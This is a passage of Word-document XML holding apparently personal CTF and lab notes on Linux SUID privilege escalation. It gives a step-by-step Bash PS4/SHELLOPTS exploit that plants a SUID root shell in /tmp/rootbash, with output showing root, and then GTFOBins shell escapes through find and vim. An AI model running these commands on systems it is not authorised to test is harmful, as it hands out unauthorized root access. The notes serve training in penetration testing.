        <w:t xml:space="preserve">In Bash versions 4.4 and above, the PS4 environment variable is not inherited by shells running as root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002144">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002145">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to Exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002146">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1243"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Find SUID/SGID files on the target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1243"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2&gt; /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002148">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1243"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002149">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1243"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-rwsr-sr-x 1 root staff 6883 May 14 2017 /usr/local/bin/suid-env2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000214A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1243"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000214B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1243"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The suid-env2 file should execute with root user permissions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000214C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1243"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run strings on the SUID file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000214D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1243"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ strings /usr/local/bin/suid-env2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000214E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1243"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000214F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1243"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/sbin/service apache2 start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002150">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1243"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The file could be trying to run the /usr/sbin/service program</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002151">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1243"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can verify this with strace:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002152">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1243"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ strace -v -f -e execve /usr/local/bin/suid-env2 2&gt;&amp;1 | grep service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002153">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1243"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[pid 16729] execve("/bin/sh", ["sh", "-c", "/usr/sbin/service apache2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002154">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1243"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">start"]...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002155">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1243"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Optionally, we can also verify with ltrace:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002156">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1243"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ ltrace /usr/local/bin/suid-env 2&gt;&amp;1 | grep service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002157">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1243"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">system("service apache2 start"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002158">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1243"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This reveals that the system function is being used to execute the service program</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002159">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1243"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run the SUID file with bash debugging enabled and the PS4 variable assigned to our payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000215A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1243"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chown root /tmp/rootbash; chmod +s /tmp/rootbash)' /usr/local/bin/suid-env2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000215B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1243"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run the /tmp/rootbash file with the -p command line option to get a root shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000215C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1243"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ /tmp/rootbash -p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000215D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1243"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rootbash-4.1# id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000215E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1243"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">uid=1000(user) gid=1000(user) euid=0(root) egid=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000215F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1243"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(pl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002160">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1243"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ugdev),1000(user)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002161">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021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63">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_75idqaetrvi4" w:id="291"/>
      <w:bookmarkEnd w:id="291"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SUID attacks from GTFOBins</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002164">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002165">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wzv2kj648o05" w:id="292"/>
      <w:bookmarkEnd w:id="292"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/find</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002166">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002167">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also seen in </w:t>
      </w:r>
      <w:hyperlink r:id="rId705">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Nibbles</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002168">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002169">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also seen in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId706">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Quackerjack</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16A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000216B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can either abuse it using the way as specified in GTFOBins, but if that doesn't work, you can also use this alternative command used in this write up for </w:t>
      </w:r>
      <w:hyperlink r:id="rId707">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">DC-1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> But in this case, both the GTFOBins and this command work</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000216C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="382"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find /root/thefinalflag.txt -exec /bin/sh \;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000216D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="382"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You don't have to replace "/root/thefinalflag.txt." It doesn't exist even in the actual box</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000216E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000216F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_kmcl6nekgv6v" w:id="293"/>
      <w:bookmarkEnd w:id="293"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/vim </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002170">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002171">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On GTFOBins, the exploit for VIM using SUID was:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002172">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1215"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./vim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002173">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002174">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But our machine didn't have</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /bin/sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, so it might look like the command doesn't work. But, all we had to do was switch </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/sh </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /bin/bash </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
